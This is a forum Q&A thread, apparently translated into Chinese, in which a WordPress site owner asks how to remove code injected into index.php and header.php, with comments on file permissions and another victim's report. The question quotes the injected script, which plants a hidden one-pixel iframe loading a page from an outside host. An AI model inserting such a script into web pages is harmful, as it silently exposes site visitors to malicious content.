【发布时间】:2012-12-12 17:14:26
【问题描述】:
我的(Wordpress)网站似乎被黑了,代码被添加到主 index.php 文件、主题 index.php 文件和主题 header.php 文件中。
这部分来自header.php
#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () { var kilun = document.createElement('iframe'); kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php'; kilun.style.position = 'absolute'; kilun.style.border = '0'; kilun.style.height = '1px'; kilun.style.width = '1px'; kilun.style.left = '1px'; kilun.style.top = '1px'; if (!document.getElementById('kilun')) { document.write('<div id=\'kilun\'></div>'); document.getElementById('kilun').appendChild(kilun); }})();</script>";
#/f524d6#
谁能告诉我如何删除它?删除代码行后返回。
【问题讨论】:
-
更改文件的权限以使 PHP 无法编写它,删除代码,然后检查错误日志以了解哪个文件无法打开它。 (它可能不起作用,但值得一试。)
-
不仅仅是 Wordpress。今天早上我在我的网站上找到了这个。经过搜索,我发现许多其他网站都有相同的代码,尽管有波兰、斯洛伐克和瑞典的地址参考。我的密码被更改了,文件被清理了,一个早上的时间都丢失了。我很想知道是否有人确定了这些网站试图做什么。